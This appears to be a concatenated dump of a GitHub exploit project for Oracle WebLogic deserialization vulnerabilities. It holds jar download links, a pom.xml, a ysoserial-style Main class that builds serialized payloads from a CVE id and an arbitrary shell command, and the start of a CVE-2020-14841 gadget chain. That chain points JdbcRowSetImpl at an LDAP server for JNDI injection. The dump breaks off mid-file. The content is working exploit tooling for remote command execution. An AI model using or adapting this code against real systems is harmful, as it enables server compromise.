/weblogic/lib/jar_files/toplink-grid.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/toplink-grid.jar
--------------------------------------------------------------------------------
/weblogic/lib/weblogic/coherence.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/weblogic/coherence.jar
--------------------------------------------------------------------------------
/weblogic/lib/weblogic/commons-cli-1.4.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/weblogic/commons-cli-1.4.jar
--------------------------------------------------------------------------------
/weblogic/lib/weblogic/commons-codec-1.15.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/weblogic/commons-codec-1.15.jar
--------------------------------------------------------------------------------
/weblogic/lib/weblogic/commons-collections-3.1.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/weblogic/commons-collections-3.1.jar
--------------------------------------------------------------------------------
/weblogic/lib/weblogic/commons-httpclient-3.1.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/weblogic/commons-httpclient-3.1.jar
--------------------------------------------------------------------------------
/weblogic/lib/weblogic/commons-io-2.7.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/weblogic/commons-io-2.7.jar
--------------------------------------------------------------------------------
/weblogic/lib/weblogic/commons-logging-1.2.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/weblogic/commons-logging-1.2.jar
--------------------------------------------------------------------------------
/weblogic/lib/weblogic/jsafeFIPS.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/weblogic/jsafeFIPS.jar
--------------------------------------------------------------------------------
/weblogic/lib/weblogic/wlcipher.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/weblogic/wlcipher.jar
--------------------------------------------------------------------------------
/weblogic/lib/weblogic/wlfullclient.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/weblogic/wlfullclient.jar
--------------------------------------------------------------------------------
/weblogic/pom.xml:
--------------------------------------------------------------------------------
1 |
2 |
5 |
6 | JavaVulnSummary
7 | com.r17a
8 | 1.0-SNAPSHOT
9 |
10 | 4.0.0
11 |
12 | weblogic
13 |
14 |
15 |
16 | org.apache.maven.plugins
17 | maven-compiler-plugin
18 |
19 | 6
20 | 6
21 |
22 |
23 |
24 |
25 |
26 |
27 |
--------------------------------------------------------------------------------
/weblogic/src/main/java/com/r17a/weblogic/Main.java:
--------------------------------------------------------------------------------
1 | package com.r17a.weblogic;
2 |
3 | import com.r17a.weblogic.cve.ObjectPayload;
4 |
5 | public class Main {
6 | private static final int INTERNAL_ERROR_CODE = 70;
7 | private static final int USAGE_CODE = 64;
8 |
9 | public static void main(final String[] args) {
10 | if (args.length != 2) {
11 | printUsage();
12 | System.exit(USAGE_CODE);
13 | }
14 | final String cveId = args[0];
15 | final String cmd = args[1];
16 | // String cveId = "CVE-2021-2135";
17 | // String cmd = "calc";
18 |
19 | try {
20 | String className = "weblogic.cve." + cveIdDeal(cveId);
21 | final Class extends ObjectPayload> clazz = (Class extends ObjectPayload>) Class.forName(className);
22 | ObjectPayload o = clazz.newInstance();
23 | o.getSerFile(cmd);
24 | }catch (Exception e){
25 | System.out.println(e);
26 | }
27 | }
28 |
29 | private static String cveIdDeal(String cveId){
30 | if (cveId.contains("-")) {
31 | // 替换-为_,CVE-2020-2555->CVE_2020_2555
32 | cveId = cveId.replace("-","_");
33 | }
34 | cveId = cveId.toUpperCase();
35 | return cveId;
36 | }
37 |
38 | private static void printUsage() {
39 | System.err.println("Y SO SERIAL?");
40 | System.err.println("Usage: java -jar ysoserial-[version]-all.jar [cveid] '[command]'");
41 | System.err.println("eg: java -jar ysoserial-[version]-all.jar 'CVE-2021-2135' 'calc'");
42 | }
43 | }
44 |
--------------------------------------------------------------------------------
/weblogic/src/main/java/com/r17a/weblogic/cve/CVE_2020_14841.java:
--------------------------------------------------------------------------------
1 | package com.r17a.weblogic.cve;
2 |
3 | import com.sun.rowset.JdbcRowSetImpl;
4 | import com.tangosol.util.comparator.ExtractorComparator;
5 | import oracle.eclipselink.coherence.integrated.internal.cache.LockVersionExtractor;
6 | import org.eclipse.persistence.internal.descriptors.MethodAttributeAccessor;
7 |
8 | import java.io.*;
9 | import java.lang.reflect.Field;
10 | import java.util.PriorityQueue;
11 |
12 | public class CVE_2020_14841 {
13 | public static void main(String[] args) throws Exception {
14 | // JdbcRowSetImpl
15 | JdbcRowSetImpl jdbcRowSet = new JdbcRowSetImpl();
16 | jdbcRowSet.setDataSourceName("ldap://127.0.0.1:1389/cn=foo,dc=example,dc=com");
17 |
18 | MethodAttributeAccessor methodAttributeAccessor = new MethodAttributeAccessor();
19 | methodAttributeAccessor.setGetMethodName("getDatabaseMetaData");
20 | methodAttributeAccessor.setIsWriteOnly(true);
21 | methodAttributeAccessor.setAttributeName("xxx");
22 |
23 | LockVersionExtractor extractor = new LockVersionExtractor(methodAttributeAccessor, "xxx");
24 |
25 | ExtractorComparator comparator = new ExtractorComparator(extractor);
26 | PriorityQueue